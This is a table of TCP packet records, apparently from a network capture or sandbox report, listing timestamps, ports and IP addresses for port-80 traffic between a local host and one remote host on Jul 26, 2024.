Jul 26, 2024 18:56:42.088428020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088433027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.088433027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.088439941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088452101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088462114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.088465929 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.088526011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.088526964 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.089008093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089018106 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089027882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089037895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089047909 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089059114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089065075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.089070082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089080095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089087009 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.089091063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089102983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089104891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.089112997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.089145899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.089178085 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114186049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114206076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114218950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114289045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114305019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114320040 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114334106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114341974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114356041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114362001 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114413977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114413977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114759922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114792109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114801884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114811897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114820957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114831924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114836931 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114840984 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114846945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114860058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.114861965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114882946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114912987 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.114942074 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.115823984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115842104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115853071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115861893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115870953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115881920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115890980 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115892887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.115900993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115916967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.115919113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115931034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115942955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115943909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.115943909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.115953922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115964890 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115977049 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.115993023 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.116031885 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.116063118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.116985083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.116997004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117007017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117017984 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117029905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117038965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.117046118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117070913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.117070913 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.117103100 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.117537975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117551088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117561102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117573023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117584944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117598057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.117609978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.117644072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.117672920 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.118251085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118262053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118273020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118283987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118294954 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118308067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118319988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118319988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.118319988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.118330956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118345022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118345976 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.118355989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118369102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118374109 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118385077 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118396997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.118448973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.119980097 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.119991064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.120001078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.120012045 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.120023012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.120014906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.120014906 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.120053053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.120053053 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.120068073 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.130623102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.130657911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.130667925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.130677938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.130688906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.130700111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.130709887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.130759954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.130805969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.131011963 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.131023884 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.131035089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.131045103 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.131056070 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.131066084 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.131067038 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.131078005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.131092072 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.131124973 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.164347887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.164390087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.164401054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.164465904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.165061951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.165072918 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.165083885 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.165095091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.165102005 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.165139914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.181885004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.181931019 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.181941032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.181946039 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.181952000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.181961060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.181973934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182049036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182071924 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182218075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182229042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182240009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182250023 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182260036 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182261944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182282925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182308912 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182503939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182521105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182531118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182542086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182543993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182554007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182564974 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182569027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182571888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182583094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182593107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182599068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182602882 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182626963 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182657957 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.182940960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182951927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182961941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182972908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182985067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.182987928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.183010101 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.183027983 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.198153973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198213100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198221922 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198323965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.198338985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198349953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198360920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198371887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198394060 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.198410988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.198627949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198638916 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198648930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198661089 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198672056 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198681116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198692083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.198709965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.198725939 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.198755980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.205507994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205519915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205529928 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205573082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.205614090 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.205677032 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205687046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205697060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205708981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205734968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.205754995 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.205959082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205969095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205980062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.205991030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206003904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206007004 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206015110 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206026077 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206029892 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206041098 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206052065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206062078 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206087112 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206649065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206659079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206669092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206680059 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206690073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206700087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206701994 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206712008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206713915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206722975 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206734896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206739902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206746101 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206753969 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206758022 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206769943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206779957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206789017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.206800938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.206820965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.207670927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207683086 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207693100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207698107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207710981 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207721949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207731962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207732916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.207732916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.207743883 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207753897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207762003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.207765102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207777977 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207783937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.207791090 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207801104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207812071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.207813978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.207813978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.207853079 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.208434105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.208471060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.208487988 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.208523989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.208523989 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.211393118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.211405993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.211416006 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.211462975 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.211483002 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.211493969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.211502075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.211504936 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.211517096 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.211536884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.211570978 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.218580008 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.218621969 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.218630075 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.218673944 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.218684912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.218692064 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.218698978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.218730927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.218730927 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.218780041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.261080027 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.261111021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.261123896 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.261234999 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.261245012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.261256933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.261269093 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.261284113 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.261328936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.261328936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.261328936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.273874998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.273889065 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.273900986 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.273957968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.273992062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.274020910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274032116 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274044037 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274055004 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274071932 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.274096966 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.274271965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274317980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.274359941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274374962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274385929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274398088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274409056 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.274410009 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274421930 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:42.274426937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.274451971 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:42.274483919 CEST	49757	80	192.168.2.4	147.45.44.104
